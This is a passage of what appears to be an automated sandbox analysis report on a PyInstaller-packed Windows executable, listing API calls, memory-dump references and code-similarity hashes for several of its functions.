                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(?,?,?,00007FF7E12D0C90,?,?,?,00007FF7E12D22FA,?,?,?,?,?,00007FF7E12D3AE9), ref: 00007FF7E12DD63A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                                                      • Instruction ID: 6e2baa4037b2b19c620ba4ac7aeafc4a5e396838dfde7811840410d8a8b2229c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28F05E12F0C64A4AFF553771AC03375929C5F887A0F884732DD2E852C5DEBCB48081B2
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                                                      • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                                                      • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                                                      • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                                                      • Instruction ID: eba343eb55c1bcdafe6450e80ed1054b3ccd7343653f69bfcc94d6bd62d1b3b5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8D17232B08A8286E711AF34EC563A9B768FF84758F808237DA5D87A94DFBCD144C711
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Tuple$Arg_Err_Parse$Sequence_malloc$ClearReferenceString$AllocateCheckCopyDeallocInitializeLengthSizememset
                                                                                                                                                                                                                                                                                      • String ID: (bbbbbb)O:SID$AllocateAndInitializeSid$SID buffer size beyond INT_MAX$s#:SID$sub authorities must be a sequence of integers.$sub authorities sequence size must be <= 8$|llllllll:SID$|n:SID
                                                                                                                                                                                                                                                                                      • API String ID: 2352083970-3682999398
                                                                                                                                                                                                                                                                                      • Opcode ID: 020ee9fc2ce227d5ea7689a31ee209964d0e18efe041a45036f0acedb8e9d53f
                                                                                                                                                                                                                                                                                      • Instruction ID: 36e2b9b0f6d6ac1bf787ea7c6026aaad067550465a0a939f1f0d7cfa83fd9776
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 020ee9fc2ce227d5ea7689a31ee209964d0e18efe041a45036f0acedb8e9d53f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C81F832A18B4299EB109F69E8402AD33A4FF48BC8F804536EB4D97B69EF3CD514C740
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DescriptorSecurityfree$DaclErr_String$Arg_GroupLengthOwnerParseTupleValid
                                                                                                                                                                                                                                                                                      • String ID: SetSecurityDescriptorDacl$The object is not a PyACL object$iOi:SetSecurityDescriptorDacl
                                                                                                                                                                                                                                                                                      • API String ID: 1359849467-4100764314
                                                                                                                                                                                                                                                                                      • Opcode ID: c69bcfbae6702bafd583d989010392b99e7b92f64845daa9d82c487b6be77957
                                                                                                                                                                                                                                                                                      • Instruction ID: 55efac4c5ec802a75f50cfe6deeaa5ee2ea02a5f6e9e606eeeb97f631241d610
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c69bcfbae6702bafd583d989010392b99e7b92f64845daa9d82c487b6be77957
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3511922B18B5299FB559FAAD8401BC23A1BF44FC8F894432EF1D67AA5DE3CE445C310
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C41B
                                                                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C48A
                                                                                                                                                                                                                                                                                      • PyUnicode_FromWideChar.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C549
                                                                                                                                                                                                                                                                                      • PyUnicode_DecodeMBCS.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C568
                                                                                                                                                                                                                                                                                      • Py_BuildValue.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C57D
                                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C595
                                                                                                                                                                                                                                                                                      • PyErr_SetObject.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5AA
                                                                                                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5BE
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Unicode_$BuildCharDeallocDecodeErr_ErrorFormatFreeFromLastLocalMessageObjectValueWide
                                                                                                                                                                                                                                                                                      • String ID: (iNN)$No error message is available$ignore
                                                                                                                                                                                                                                                                                      • API String ID: 3492665310-37674240
                                                                                                                                                                                                                                                                                      • Opcode ID: 89342b33277597b3a4676ff5a8e6ea240fe01a07b6f10a9c172c7993dd11e9a3
                                                                                                                                                                                                                                                                                      • Instruction ID: e30745f1ae5c96369d829667a7ad3486a17fb59b1628ae886c7e7cc53dc84729
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89342b33277597b3a4676ff5a8e6ea240fe01a07b6f10a9c172c7993dd11e9a3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4514A22A08B5285FA648F5DA44427D63A2BF89FD4F984276EB4E437F5DE3CE4428300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 313767242-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a77b7a5226053fc0ebc07969f81f816b5156b1559ac007c1bd8a292e365ebe04
                                                                                                                                                                                                                                                                                      • Instruction ID: e29c234ddd35413f65f1a73b5ff3158f76fd8f647df39c82c0955a09b620e254
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a77b7a5226053fc0ebc07969f81f816b5156b1559ac007c1bd8a292e365ebe04
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5311A72609B8186EB609FA5E8503ED7364FB84B94F44443ADB4D8BBA9DF3CD648C710
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573993442.00007FF8B8261000.00000020.00000001.01000000.0000002F.sdmp, Offset: 00007FF8B8260000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573922181.00007FF8B8260000.00000002.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4574064690.00007FF8B8263000.00000002.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4574129290.00007FF8B8264000.00000004.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4574205224.00007FF8B8265000.00000002.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b8260000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 313767242-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f8ae4d2eff8d27b3a0b7405f1d7147d7316b9bc7e7709510c05685c771672a79
                                                                                                                                                                                                                                                                                      • Instruction ID: e158997cee793527f0956da554860688c1a7e78e5e6f17100acc7527c707a899
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8ae4d2eff8d27b3a0b7405f1d7147d7316b9bc7e7709510c05685c771672a79
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA316F72609B818AEB608FA4E8503ED73A4FB84785F44443ADB4E47B98DF3CD649C718
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C842B
                                                                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84AE
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84CD
                                                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84DB
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84EC
                                                                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84F5
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                                                      • String ID: %s\*
                                                                                                                                                                                                                                                                                      • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                                                      • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                                                                      • Instruction ID: be77b914b5352e0c1d764396ffd378e90c9967b9c534c40af67204c626d5dd18
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59418221B0C94285EB30AB10EC463BAE369FB94754FC18237D69D83694EFBCD585C762
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                                                      • Instruction ID: da7d22fd89f193bd324d2f6b7ffb245b114b81ec7e29bfa21c2b7e0aa29bb85c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C313D72709B8586EB619F60E8813EEB364FB84704F44403BDA4E57B99DFB8D548C721
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7E12E5C45
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12E5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E55AC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12DA948: HeapFree.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA95E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12DA948: GetLastError.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA968
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12DA900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7E12DA8DF,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DA909
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12DA900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7E12DA8DF,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DA92E
                                                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7E12E5C34
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12E55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E560C
                                                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7E12E5EAA
                                                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7E12E5EBB
                                                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7E12E5ECC
                                                                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7E12E610C), ref: 00007FF7E12E5EF3
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4070488512-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                                                                      • Instruction ID: 0f0351766d532e8329fa7609a255cc26f3cec78aba50a6adecb84e9bc3bcff5f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFD1C26AB2824246E721BF31DC423B9E399EF54784FC4C137EA0E87695DEBCE4418761
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                                                      • Instruction ID: 84ae083db916b73a3733ca75b8e9d0c1cd0b6ab5210fd16ecbf27b7c1088da8e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06317E32708B8186EB219B25EC417AEB3A8FB88754F944136EA8D47B54DF7CC145CB11
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2227656907-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                                                                      • Instruction ID: 068de04bf61d9c0822f8e4dbc7e7ab4d78100c12cb94ced40b438c1c9ad3aafc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0BB1B922B1868241EF62AB21DD027B9E398EB44BE4F849137D95D877C5EEBCE441D313
